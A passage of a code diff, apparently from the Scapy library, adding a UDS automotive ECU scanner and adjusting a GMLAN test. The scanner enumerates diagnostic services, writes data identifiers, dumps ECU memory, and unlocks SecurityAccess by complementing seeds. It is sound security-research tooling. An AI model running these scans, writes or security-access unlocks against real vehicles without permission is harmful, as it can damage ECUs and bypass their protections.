enter_state(socket, # type: _SocketUnion + configuration, # type: AutomotiveTestCaseExecutorConfiguration # noqa: E501 + request # type: Packet + ): # type: (...) -> bool + timeout = configuration[UDS_DSCEnumerator.__name__].get("timeout", 3) + ans = socket.sr1(request, timeout=timeout, verbose=False) + if ans is not None: + if configuration.verbose: + log_interactive.debug( + "Try to enter session req: %s, resp: %s" % + (repr(request), repr(ans))) + return cast(int, ans.service) != 0x7f + else: + return False + + def get_new_edge(self, + socket, # type: _SocketUnion + config # type: AutomotiveTestCaseExecutorConfiguration + ): # type: (...) -> Optional[_Edge] + edge = super(UDS_DSCEnumerator, self).get_new_edge(socket, config) + if edge: + state, new_state = edge + # Force TesterPresent if session is changed + new_state.tp = 1 # type: ignore + return state, new_state + return None + + @staticmethod + def enter_state_with_tp(sock, # type: _SocketUnion + conf, # type: AutomotiveTestCaseExecutorConfiguration # noqa: E501 + kwargs # type: Dict[str, Any] + ): # type: (...) -> bool + UDS_TPEnumerator.enter(sock, conf, kwargs) + # Wait 5 seconds, since some ECUs require time + # to switch to the bootloader + delay = conf[UDS_DSCEnumerator.__name__].get("delay_state_change", 5) + time.sleep(delay) + state_changed = UDS_DSCEnumerator.enter_state( + sock, conf, kwargs["req"]) + if not state_changed: + UDS_TPEnumerator.cleanup(sock, conf) + return state_changed + + def get_transition_function(self, socket, edge): + # type: (_SocketUnion, _Edge) -> Optional[_TransitionTuple] + return UDS_DSCEnumerator.enter_state_with_tp, { + "req": self._results[-1].req, + "desc": "DSC=%d" % self._results[-1].req.diagnosticSessionType + }, UDS_TPEnumerator.cleanup + + +class UDS_TPEnumerator(UDS_Enumerator, StateGeneratingServiceEnumerator): + _description = "TesterPresent supported" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + return [UDS() / UDS_TP()] + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "TesterPresent:" + + @staticmethod + def enter(socket, # type: _SocketUnion + configuration, # type: AutomotiveTestCaseExecutorConfiguration + _ # type: Dict[str, Any] + ): # type: (...) -> bool + if configuration.unittest: + configuration["tps"] = None + socket.sr1(UDS() / UDS_TP(), timeout=0.1, verbose=False) + return True + + UDS_TPEnumerator.cleanup(socket, configuration) + configuration["tps"] = UDS_TesterPresentSender(socket) + configuration["tps"].start() + return True + + @staticmethod + def cleanup(_, configuration): + # type: (_SocketUnion, AutomotiveTestCaseExecutorConfiguration) -> bool + try: + configuration["tps"].stop() + configuration["tps"] = None + except (AttributeError, KeyError) as e: + log_interactive.debug("Cleanup TP-Sender Error: %s", e) + return True + + def get_transition_function(self, socket, edge): + # type: (_SocketUnion, _Edge) -> Optional[_TransitionTuple] + return self.enter, {"desc": "TP"}, self.cleanup + + +class UDS_EREnumerator(UDS_Enumerator): + _description = "ECUReset supported" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + reset_type = kwargs.pop("scan_range", range(0x100)) + return cast(Iterable[Packet], UDS() / UDS_ER(resetType=reset_type)) + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "0x%02x: %s" % ( + tup[1].resetType, tup[1].sprintf("%UDS_ER.resetType%")) + + +class UDS_CCEnumerator(UDS_Enumerator): + _description = "CommunicationControl supported" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + control_type = kwargs.pop("scan_range", range(0x100)) + return cast(Iterable[Packet], UDS() / UDS_CC( + controlType=control_type, communicationType0=1, + communicationType2=15)) + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "0x%02x: %s" % ( + tup[1].controlType, tup[1].sprintf("%UDS_CC.controlType%")) + + +class UDS_RDBPIEnumerator(UDS_Enumerator): + _description = "ReadDataByPeriodicIdentifier supported" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + pdid = kwargs.pop("scan_range", range(0x100)) + return cast(Iterable[Packet], UDS() / UDS_RDBPI( + transmissionMode=1, periodicDataIdentifier=pdid)) + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + resp = tup[2] + if resp is not None: + return "0x%02x %s: %s" % ( + tup[1].periodicDataIdentifier, + tup[1].sprintf("%UDS_RDBPI.periodicDataIdentifier%"), + resp.dataRecord) + else: + return "0x%02x %s: No response" % ( + tup[1].periodicDataIdentifier, + tup[1].sprintf("%UDS_RDBPI.periodicDataIdentifier%")) + + +class UDS_ServiceEnumerator(UDS_Enumerator): + _description = "Available services and negative response per state" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + # Only generate services with unset positive response bit (0x40) + return (UDS(service=x) for x in range(0x100) if not x & 0x40) + + def _evaluate_response(self, + state, # type: EcuState + request, # type: Packet + response, # type: Optional[Packet] + **kwargs # type: Optional[Dict[str, Any]] + ): # type: (...) -> bool + if response and response.service == 0x51: + log_interactive.warning( + "ECUResetPositiveResponse detected! This might have changed " + "the state of the ECU under test.") + + # remove args from kwargs since they will be overwritten + kwargs["exit_if_service_not_supported"] = False # type: ignore + + return super(UDS_ServiceEnumerator, self)._evaluate_response( + state, request, response, **kwargs) + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "0x%02x: %s" % (tup[1].service, tup[1].sprintf("%UDS.service%")) + + +class UDS_RDBIEnumerator(UDS_Enumerator): + _description = "Readable data identifier per state" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + scan_range = kwargs.pop("scan_range", range(0x10000)) + return (UDS() / UDS_RDBI(identifiers=[x]) for x in scan_range) + + @staticmethod + def print_information(resp): + # type: (Packet) -> str + load = bytes(resp)[3:] if len(resp) > 3 else "No data available" + return "PR: %s" % load + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "0x%04x: %s" % (tup[1].identifiers[0], + tup[1].sprintf("%UDS_RDBI.identifiers%")[1:-1]) + + def _get_table_entry_z(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return self._get_label(tup[2], self.print_information) + + +class UDS_RDBISelectiveEnumerator(StagedAutomotiveTestCase): + @staticmethod + def __connector_rnd_to_seq(rdbi_random, # type: AutomotiveTestCaseABC + _ # type: AutomotiveTestCaseABC + ): # type: (...) -> Dict[str, Any] + rdbi_random = cast(UDS_Enumerator, rdbi_random) + identifiers_with_positive_response = \ + [p.resp.dataIdentifier + for p in rdbi_random.results_with_positive_response] + + scan_range = UDS_RDBISelectiveEnumerator. \ + points_to_blocks(identifiers_with_positive_response) + return {"scan_range": scan_range} + + @staticmethod + def points_to_blocks(pois): + # type: (Sequence[int]) -> Iterable[int] + + if len(pois) == 0: + # quick path for better performance + return [] + + block_size = UDS_RDBIRandomEnumerator.block_size + generators = [] + for start in range(0, 2 ** 16, block_size): + end = start + block_size + pr_in_block = any((start <= identifier < end + for identifier in pois)) + if pr_in_block: + generators.append(range(start, end)) + scan_range = itertools.chain.from_iterable(generators) + return scan_range + + def __init__(self): + # type: () -> None + super(UDS_RDBISelectiveEnumerator, self).__init__( + [UDS_RDBIRandomEnumerator(), UDS_RDBIEnumerator()], + [None, self.__connector_rnd_to_seq]) + + +class UDS_RDBIRandomEnumerator(UDS_RDBIEnumerator): + block_size = 2 ** 6 + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + + samples_per_block = { + 4: 29, 5: 22, 6: 19, 8: 11, 9: 11, 10: 13, 11: 14, 12: 31, 13: 4, + 14: 26, 16: 30, 17: 4, 18: 20, 19: 5, 20: 49, 21: 54, 22: 9, 23: 4, + 24: 10, 25: 8, 28: 6, 29: 3, 32: 11, 36: 4, 37: 3, 40: 9, 41: 9, + 42: 3, 44: 2, 47: 3, 48: 4, 49: 3, 52: 8, 64: 35, 66: 2, 68: 24, + 69: 19, 70: 30, 71: 28, 72: 16, 73: 4, 74: 6, 75: 27, 76: 41, + 77: 11, 78: 6, 81: 2, 88: 3, 90: 2, 92: 16, 97: 15, 98: 20, 100: 6, + 101: 5, 102: 5, 103: 10, 106: 10, 108: 4, 124: 3, 128: 7, 136: 15, + 137: 14, 138: 27, 139: 10, 148: 9, 150: 2, 152: 2, 168: 23, + 169: 15, 170: 16, 171: 16, 172: 2, 176: 3, 177: 4, 178: 2, 187: 2, + 232: 3, 235: 2, 240: 8, 252: 25, 256: 7, 257: 2, 287: 6, 290: 2, + 316: 2, 319: 3, 323: 3, 324: 19, 326: 2, 327: 2, 330: 4, 331: 10, + 332: 3, 334: 8, 338: 3, 832: 6, 833: 2, 900: 4, 956: 4, 958: 3, + 964: 12, 965: 13, 966: 34, 967: 3, 972: 10, 1000: 3, 1012: 23, + 1013: 14, 1014: 15 + } + to_scan = [] + block_size = UDS_RDBIRandomEnumerator.block_size + for block_index, start in enumerate(range(0, 2 ** 16, block_size)): + end = start + block_size + count_samples = samples_per_block.get(block_index, 1) + to_scan += random.sample(range(start, end), count_samples) + + # Use locality effect + # If an identifier brought a positive response in any state, + # it is likely that in another state it is available as well + positive_identifiers = [t.resp.dataIdentifier for t in + self.results_with_positive_response] + to_scan += positive_identifiers + + # make all identifiers unique with set() + # Sort for better logs + to_scan = sorted(list(set(to_scan))) + return (UDS() / UDS_RDBI(identifiers=[x]) for x in to_scan) + + +class UDS_WDBIEnumerator(UDS_Enumerator): + _description = "Writeable data identifier per state" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + scan_range = kwargs.pop("scan_range", range(0x10000)) + rdbi_enumerator = kwargs.pop("rdbi_enumerator", None) + + if rdbi_enumerator is None: + log_interactive.debug("[i] Use entire scan range") + return (UDS() / UDS_WDBI(dataIdentifier=x) for x in scan_range) + elif isinstance(rdbi_enumerator, UDS_RDBIEnumerator): + log_interactive.debug("[i] Selective scan based on RDBI results") + return (UDS() / UDS_WDBI(dataIdentifier=t.resp.dataIdentifier) / + Raw(load=bytes(t.resp)[3:]) + for t in rdbi_enumerator.results_with_positive_response + if len(bytes(t.resp)) >= 3) + else: + raise Scapy_Exception("rdbi_enumerator has to be an instance " + "of UDS_RDBIEnumerator") + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "0x%04x: %s" % (tup[1].dataIdentifier, + tup[1].sprintf("%UDS_WDBI.dataIdentifier%")) + + def _get_table_entry_z(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return self._get_label(tup[2], "PR: Writeable") + + +class UDS_WDBISelectiveEnumerator(StagedAutomotiveTestCase): + @staticmethod + def __connector_rdbi_to_wdbi(rdbi, # type: AutomotiveTestCaseABC + _ # type: AutomotiveTestCaseABC + ): # type: (...) -> Dict[str, Any] + return {"rdbi_enumerator": rdbi} + + def __init__(self): + # type: () -> None + super(UDS_WDBISelectiveEnumerator, self).__init__( + [UDS_RDBIEnumerator(), UDS_WDBIEnumerator()], + [None, self.__connector_rdbi_to_wdbi]) + + +class UDS_SAEnumerator(UDS_Enumerator): + _description = "Available security seeds with access type and state" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + scan_range = kwargs.pop("scan_range", range(1, 256, 2)) + return (UDS() / UDS_SA(securityAccessType=x) for x in scan_range) + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return tup[1].securityAccessType + + def _get_table_entry_z(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return self._get_label(tup[2], lambda r: "PR: %s" % r.securitySeed) + + def pre_execute(self, socket, state, global_configuration): + # type: (_SocketUnion, EcuState, AutomotiveTestCaseExecutorConfiguration) -> None # noqa: E501 + if cast(ServiceEnumerator, self)._retry_pkt[state] is not None: + # this is a retry execute. Wait much longer than usual because + # a required time delay not expired could have been received + # on the previous attempt + time.sleep(11) + + def _evaluate_retry(self, + state, # type: EcuState + request, # type: Packet + response, # type: Packet + **kwargs # type: Optional[Dict[str, Any]] + ): # type: (...) -> bool + + if super(UDS_SAEnumerator, self)._evaluate_retry( + state, request, response, **kwargs): + return True + + if response.service == 0x7f and \ + self._get_negative_response_code(response) in [0x24, 0x37]: + log_interactive.debug( + "[i] Retry %s because requiredTimeDelayNotExpired or " + "requestSequenceError received", + repr(request)) + return super(UDS_SAEnumerator, self)._populate_retry( + state, request) + return False + + def _evaluate_response(self, + state, # type: EcuState + request, # type: Packet + response, # type: Optional[Packet] + **kwargs # type: Optional[Dict[str, Any]] + ): # type: (...) -> bool + if super(UDS_SAEnumerator, self)._evaluate_response( + state, request, response, **kwargs): + return True + + if response is not None and \ + response.service == 0x67 and \ + response.securityAccessType % 2 == 1: + log_interactive.debug("[i] Seed received. Leave scan to try a key") + return True + return False + + @staticmethod + def get_seed_pkt(sock, level=1, record=b""): + # type: (_SocketUnion, int, bytes) -> Optional[Packet] + req = UDS() / UDS_SA(securityAccessType=level, + securityAccessDataRecord=record) + for _ in range(10): + seed = sock.sr1(req, timeout=5, verbose=False) + if seed is None: + return None + elif seed.service == 0x7f and \ + UDS_Enumerator._get_negative_response_code(seed) != 0x37: + log_interactive.info( + "Security access no seed! NR: %s", repr(seed)) + return None + + elif seed.service == 0x7f and seed.negativeResponseCode == 0x37: + log_interactive.info("Security access retry to get seed") + time.sleep(10) + continue + else: + return seed + return None + + @staticmethod + def evaluate_security_access_response(res, seed, key): + # type: (Optional[Packet], Packet, Optional[Packet]) -> bool + if res is None or res.service == 0x7f: + log_interactive.info(repr(seed)) + log_interactive.info(repr(key)) + log_interactive.info(repr(res)) + log_interactive.info("Security access error!") + return False + else: + log_interactive.info("Security access granted!") + return True + + +class UDS_SA_XOR_Enumerator(UDS_SAEnumerator, StateGenerator): + _description = "XOR SecurityAccess supported" + _transition_function_args = dict() # type: Dict[_Edge, int] + + @staticmethod + def get_key_pkt(seed, level=1): + # type: (Packet, int) -> Optional[Packet] + + def key_function_int(s): + # type: (int) -> int + return 0xffffffff & ~s + + def key_function_short(s): + # type: (int) -> int + return 0xffff & ~s + + try: + s = seed.securitySeed + except AttributeError: + return None + + fmt = None + key_function = None # Optional[Callable[[int], int]] + + if len(s) == 2: + fmt = "H" + key_function = key_function_short + + if len(s) == 4: + fmt = "I" + key_function = key_function_int + + if key_function is not None and fmt is not None: + key = struct.pack(fmt, key_function(struct.unpack(fmt, s)[0])) + return cast(Packet, UDS() / UDS_SA(securityAccessType=level + 1, + securityKey=key)) + else: + return None + + @staticmethod + def get_security_access(sock, level=1, seed_pkt=None): + # type: (_SocketUnion, int, Optional[Packet]) -> bool + log_interactive.info( + "Try bootloader security access for level %d" % level) + if seed_pkt is None: + seed_pkt = UDS_SAEnumerator.get_seed_pkt(sock, level) + if not seed_pkt: + return False + + key_pkt = UDS_SA_XOR_Enumerator.get_key_pkt(seed_pkt, level) + if key_pkt is None: + return False + + res = sock.sr1(key_pkt, timeout=5, verbose=False) + return UDS_SA_XOR_Enumerator.evaluate_security_access_response( + res, seed_pkt, key_pkt) + + @staticmethod + def transition_function(sock, _, kwargs): + # type: (_SocketUnion, AutomotiveTestCaseExecutorConfiguration, Dict[str, Any]) -> bool # noqa: E501 + return UDS_SA_XOR_Enumerator.get_security_access( + sock, kwargs["sec_level"]) + + def get_new_edge(self, socket, config): + # type: (_SocketUnion, AutomotiveTestCaseExecutorConfiguration) -> Optional[_Edge] # noqa: E501 + last_resp = self._results[-1].resp + last_state = self._results[-1].state + + if last_resp is None or last_resp.service == 0x7f: + return None + + try: + if last_resp.service != 0x67 or \ + last_resp.securityAccessType % 2 != 1: + return None + + seed = last_resp + sec_lvl = seed.securityAccessType + + if self.get_security_access(socket, sec_lvl, seed): + log_interactive.debug("Security Access found.") + # create edge + new_state = copy.copy(last_state) + new_state.security_level = seed.securityAccessType + 1 # type: ignore # noqa: E501 + if last_state == new_state: + return None + edge = (last_state, new_state) + self._transition_function_args[edge] = sec_lvl + return edge + except AttributeError: + pass + + return None + + def get_transition_function(self, socket, edge): + # type: (_SocketUnion, _Edge) -> Optional[_TransitionTuple] + return self.transition_function, { + "sec_level": self._transition_function_args[edge], + "desc": "SA=%d" % self._transition_function_args[edge]}, None + + +class UDS_RCEnumerator(UDS_Enumerator): + _description = "Available RoutineControls and negative response per state" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + type_list = kwargs.pop("type_list", [1, 2, 3]) + scan_range = kwargs.pop("scan_range", range(0x10000)) + + return ( + UDS() / UDS_RC(routineControlType=rc_type, + routineIdentifier=data_id) + for rc_type, data_id in itertools.product(type_list, scan_range) + ) + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "0x%04x-%d: %s" % ( + tup[1].routineIdentifier, tup[1].routineControlType, + tup[1].sprintf("%UDS_RC.routineIdentifier%")) + + +class UDS_RCStartEnumerator(UDS_RCEnumerator): + _description = "Available RoutineControls and negative response per state" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + if "type_list" in kwargs: + raise KeyError("'type_list' already set in kwargs.") + kwargs["type_list"] = [1] + return super(UDS_RCStartEnumerator, self). \ + _get_initial_requests(**kwargs) + + +class UDS_RCSelectiveEnumerator(StagedAutomotiveTestCase): + # Used to expand points to both sites + # So, the total block size will be 253 * 2 = 506 + expansion_width = 253 + + @staticmethod + def points_to_ranges(pois): + # type: (Iterable[int]) -> Iterable[int] + expansion_width = UDS_RCSelectiveEnumerator.expansion_width + generators = [] + for identifier in pois: + start = max(identifier - expansion_width, 0) + end = min(identifier + expansion_width + 1, 0x10000) + generators.append(range(start, end)) + ranges_with_overlaps = itertools.chain.from_iterable(generators) + return sorted(set(ranges_with_overlaps)) + + @staticmethod + def __connector_start_to_rest(rc_start, _rc_stop): + # type: (AutomotiveTestCaseABC, AutomotiveTestCaseABC) -> Dict[str, Any] # noqa: E501 + rc_start = cast(UDS_Enumerator, rc_start) + identifiers_with_pr = [resp.routineIdentifier for _, _, resp, _, _ + in rc_start.results_with_positive_response] + scan_range = UDS_RCSelectiveEnumerator.points_to_ranges( + identifiers_with_pr) + + return {"type_list": [2, 3], + "scan_range": scan_range} + + def __init__(self): + # type: () -> None + super(UDS_RCSelectiveEnumerator, self).__init__( + [UDS_RCStartEnumerator(), UDS_RCEnumerator()], + [None, self.__connector_start_to_rest]) + + +class UDS_IOCBIEnumerator(UDS_Enumerator): + _description = "Available Input Output Controls By Identifier " \ + "and negative response per state" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + scan_range = kwargs.pop("scan_range", range(0x10000)) + return (UDS() / UDS_IOCBI(dataIdentifier=x) for x in scan_range) + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + resp = tup[2] + if resp is not None: + return "0x%04x: %s" % \ + (tup[1].dataIdentifier, + resp.controlStatusRecord) + else: + return "0x%04x: No response" % tup[1].dataIdentifier + + +class UDS_RMBAEnumeratorABC(UDS_Enumerator): + _description = "Readable Memory Addresses " \ + "and negative response per state" + + @staticmethod + def get_addr(pkt): + # type: (UDS_RMBA) -> int + """ + Helper function to get the memoryAddress from a UDS_RMBA packet + :param pkt: UDS_RMBA request + :return: memory address of the request + """ + return getattr(pkt, "memoryAddress%d" % pkt.memoryAddressLen) + + @staticmethod + def set_addr(pkt, addr): + # type: (UDS_RMBA, int) -> None + """ + Helper function to set the memoryAddress of a UDS_RMBA packet + :param pkt: UDS_RMBA request + :param addr: memory address to be set + """ + setattr(pkt, "memoryAddress%d" % pkt.memoryAddressLen, addr) + + @staticmethod + def get_size(pkt): + # type: (UDS_RMBA) -> int + """ + Helper function to gets the memorySize of a UDS_RMBA packet + :param pkt: UDS_RMBA request + """ + return getattr(pkt, "memorySize%d" % pkt.memorySizeLen) + + @staticmethod + def set_size(pkt, size): + # type: (UDS_RMBA, int) -> None + """ + Helper function to set the memorySize of a UDS_RMBA packet + :param pkt: UDS_RMBA request + :param size: memory size to be set + """ + set_size = min(2 ** (pkt.memorySizeLen * 8) - 1, size) + setattr(pkt, "memorySize%d" % pkt.memorySizeLen, set_size) + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "0x%04x" % self.get_addr(tup[1]) + + def _get_table_entry_z(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return self._get_label(tup[2], lambda r: "PR: %s" % r.dataRecord) + + +class UDS_RMBARandomEnumerator(UDS_RMBAEnumeratorABC): + @staticmethod + def _random_memory_addr_pkt(addr_len=None, size_len=None, size=None): + # type: (Optional[int], Optional[int], Optional[int]) -> Packet + pkt = UDS() / UDS_RMBA() # type: Packet + pkt.memorySizeLen = size_len or random.randint(1, 4) + pkt.memoryAddressLen = addr_len or random.randint(1, 4) + UDS_RMBARandomEnumerator.set_size(pkt, size or 4) + UDS_RMBARandomEnumerator.set_addr( + pkt, random.randint( + 0, (2 ** (8 * pkt.memoryAddressLen) - 1)) & 0xfffffff0) + return pkt + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + if kwargs.get("unittest", False): + return itertools.chain( + (self._random_memory_addr_pkt(addr_len=2, size_len=2) for _ in range(100)), # noqa: E501 + (self._random_memory_addr_pkt(addr_len=3) for _ in range(2)), + (self._random_memory_addr_pkt(addr_len=4) for _ in range(2))) + + return itertools.chain( + (self._random_memory_addr_pkt(addr_len=1) for _ in range(100)), + (self._random_memory_addr_pkt(addr_len=2) for _ in range(500)), + (self._random_memory_addr_pkt(addr_len=3) for _ in range(1000)), + (self._random_memory_addr_pkt(addr_len=4) for _ in range(5000))) + + +class UDS_RMBASequentialEnumerator(UDS_RMBAEnumeratorABC): + def __init__(self): + # type: () -> None + super(UDS_RMBASequentialEnumerator, self).__init__() + self.__points_of_interest = defaultdict(list) # type: Dict[EcuState, List[_PointOfInterest]] # noqa: E501 + self.__initial_points_of_interest = None # type: Optional[List[_PointOfInterest]] # noqa: E501 + + def _get_memory_addresses_from_results(self, results): + # type: (Union[List[_AutomotiveTestCaseScanResult], List[_AutomotiveTestCaseFilteredScanResult]]) -> Set[int] # noqa: E501 + mem_areas = list() + for tup in results: + resp = tup.resp + if resp is not None and resp.service == 0x23: + mem_areas += [ + range(self.get_addr(tup.req), + self.get_addr(tup.req) + len(resp.dataRecord))] + else: + mem_areas += [ + range(self.get_addr(tup.req), self.get_addr(tup.req) + 16)] + + return set(list(itertools.chain.from_iterable(mem_areas))) + + def __pois_to_requests(self, pois): + # type: (List[_PointOfInterest]) -> List[Packet] + tested_addrs = self._get_memory_addresses_from_results( + self.results_with_response) + testing_addrs = set() + new_requests = list() + + for addr, upward, mem_size_len, mem_addr_len, mem_size in pois: + for i in range(0, mem_size * 50, mem_size): + if upward: + addr = min(addr + i, 2 ** (8 * mem_addr_len) - 1) + else: + addr = max(addr - i, 0) + + if addr not in tested_addrs and \ + (addr, mem_size) not in testing_addrs: + pkt = UDS() / UDS_RMBA(memorySizeLen=mem_size_len, + memoryAddressLen=mem_addr_len) + self.set_size(pkt, mem_size) + self.set_addr(pkt, addr) + new_requests.append(pkt) + testing_addrs.add((addr, mem_size)) + + return new_requests + + def __request_to_pois(self, req, resp): + # type: (Packet, Optional[Packet]) -> List[_PointOfInterest] + + addr = self.get_addr(req) + size = self.get_size(req) + msl = req.memorySizeLen + mal = req.memoryAddressLen + + if (resp is None or resp.service == 0x7f) and size > 16: + size = size // 2 + + return [ + _PointOfInterest(addr, True, msl, mal, size), + _PointOfInterest(addr, False, msl, mal, size)] + + if resp is not None and resp.service == 0x23: + return [ + _PointOfInterest(addr + size, True, msl, mal, size), + _PointOfInterest(addr - size, False, msl, mal, size)] + + return [] + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + raise NotImplementedError + + def pre_execute(self, socket, state, global_configuration): + # type: (_SocketUnion, EcuState, AutomotiveTestCaseExecutorConfiguration) -> None # noqa: E501 + + if self.__initial_points_of_interest is None: + self.__initial_points_of_interest = \ + global_configuration[self.__class__.__name__].get( + "points_of_interest", list()) + + if not self.__points_of_interest[state]: + # Transfer initial pois to current state pois + self.__points_of_interest[state] = \ + self.__initial_points_of_interest + + new_requests = self.__pois_to_requests( + self.__points_of_interest[state]) + + if len(new_requests): + self._state_completed[state] = False + self._request_iterators[state] = new_requests + self.__points_of_interest[state] = list() + + def _evaluate_response(self, + state, # type: EcuState + request, # type: Packet + response, # type: Optional[Packet] + **kwargs # type: Optional[Dict[str, Any]] + ): # type: (...) -> bool # noqa: E501 + self.__points_of_interest[state] += \ + self.__request_to_pois(request, response) + return super(UDS_RMBASequentialEnumerator, self)._evaluate_response( + state, request, response, **kwargs) + + def show(self, dump=False, filtered=True, verbose=False): + # type: (bool, bool, bool) -> Optional[str] + s = super(UDS_RMBASequentialEnumerator, self).show( + dump, filtered, verbose) or "" + + try: + from intelhex import IntelHex + + ih = IntelHex() + for tup in self.results_with_positive_response: + for i, b in enumerate(tup.resp.dataRecord): + addr = self.get_addr(tup.req) + ih[addr + i] = orb(b) + + ih.tofile("RMBA_dump.hex", format="hex") + except ImportError: + err_msg = "Install 'intelhex' to create a hex file of the memory" + log_interactive.critical(err_msg) + with open("RMBA_dump.hex", "w") as file: + file.write(err_msg) + + if dump: + return s + "\n" + else: + print(s) + return None + + +class UDS_RMBAEnumerator(StagedAutomotiveTestCase): + @staticmethod + def __connector_rand_to_seq(rand, _): + # type: (AutomotiveTestCaseABC, AutomotiveTestCaseABC) -> Dict[str, Any] # noqa: E501 + points_of_interest = list() # type: List[_PointOfInterest] + rand = cast(UDS_RMBARandomEnumerator, rand) + for tup in rand.results_with_positive_response: + points_of_interest += \ + [_PointOfInterest(UDS_RMBAEnumeratorABC.get_addr(tup.req), + True, tup.req.memorySizeLen, + tup.req.memoryAddressLen, 0x80), + _PointOfInterest(UDS_RMBAEnumeratorABC.get_addr(tup.req), + False, tup.req.memorySizeLen, + tup.req.memoryAddressLen, 0x80)] + + return {"points_of_interest": points_of_interest} + + def __init__(self): + # type: () -> None + super(UDS_RMBAEnumerator, self).__init__( + [UDS_RMBARandomEnumerator(), UDS_RMBASequentialEnumerator()], + [None, self.__connector_rand_to_seq]) + + +class UDS_RDEnumerator(UDS_Enumerator): + _description = "RequestDownload supported" + + @staticmethod + def _random_memory_addr_pkt(addr_len=None): # noqa: E501 + # type: (Optional[int]) -> Packet + pkt = UDS() / UDS_RD() # type: Packet + pkt.dataFormatIdentifiers = random.randint(0, 16) + pkt.memorySizeLen = random.randint(1, 4) + pkt.memoryAddressLen = addr_len or random.randint(1, 4) + UDS_RMBARandomEnumerator.set_size(pkt, 0x10) + addr = random.randint(0, 2 ** (8 * pkt.memoryAddressLen) - 1) & \ + (0xffffffff << (4 * pkt.memoryAddressLen)) + UDS_RMBARandomEnumerator.set_addr(pkt, addr) + return pkt + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + if kwargs.get("unittest", False): + return itertools.chain( + (self._random_memory_addr_pkt(addr_len=1) for _ in range(100)), + (self._random_memory_addr_pkt(addr_len=2) for _ in range(500))) + + return itertools.chain( + (self._random_memory_addr_pkt(addr_len=1) for _ in range(100)), + (self._random_memory_addr_pkt(addr_len=2) for _ in range(500)), + (self._random_memory_addr_pkt(addr_len=3) for _ in range(1000)), + (self._random_memory_addr_pkt(addr_len=4) for _ in range(5000))) + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "0x%04x" % UDS_RMBAEnumeratorABC.get_addr(tup[1]) + + +class UDS_TDEnumerator(UDS_Enumerator): + _description = "TransferData supported" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + cnt = kwargs.pop("scan_range", range(0x100)) + return cast(Iterable[Packet], UDS() / UDS_TD(blockSequenceCounter=cnt)) + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "0x%02x: %s" % ( + tup[1].blockSequenceCounter, + tup[1].sprintf("%UDS_TD.blockSequenceCounter%")) + + +class UDS_Scanner(AutomotiveTestCaseExecutor): + @property + def default_test_case_clss(self): + # type: () -> List[Type[AutomotiveTestCaseABC]] + return [UDS_ServiceEnumerator, UDS_DSCEnumerator, UDS_TPEnumerator, + UDS_SAEnumerator, UDS_WDBISelectiveEnumerator, + UDS_RMBAEnumerator, UDS_RCEnumerator, UDS_IOCBIEnumerator] diff --git a/test/contrib/automotive/ecu.uts b/test/contrib/automotive/ecu.uts index 1319f619a76..f83d2cf636a 100644 --- a/test/contrib/automotive/ecu.uts +++ b/test/contrib/automotive/ecu.uts @@ -554,7 +554,9 @@ assert len(ecu.log["TransferData"]) == 2 session = EcuSession() -with CandumpReader(scapy_path("test/pcaps/gmlan_trace.candump.gz")) as sock: +conf.contribs['CAN']['swap-bytes'] = True + +with PcapReader(scapy_path("test/pcaps/gmlan_trace.pcap.gz")) as sock: gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=2, opened_socket=sock, timeout=3) ecu = session.ecu print("Check 1 after change to diagnostic mode") @@ -587,9 +589,10 @@ with CandumpReader(scapy_path("test/pcaps/gmlan_trace.candump.gz")) as sock: session = EcuSession(verbose=False, store_supported_responses=False) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 +conf.contribs['CAN']['swap-bytes'] = True -with CandumpReader(scapy_path("test/pcaps/gmlan_trace.candump.gz")) as sock: - gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=200, opened_socket=sock, timeout=6) +with PcapReader(scapy_path("test/pcaps/gmlan_trace.pcap.gz")) as sock: + gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], 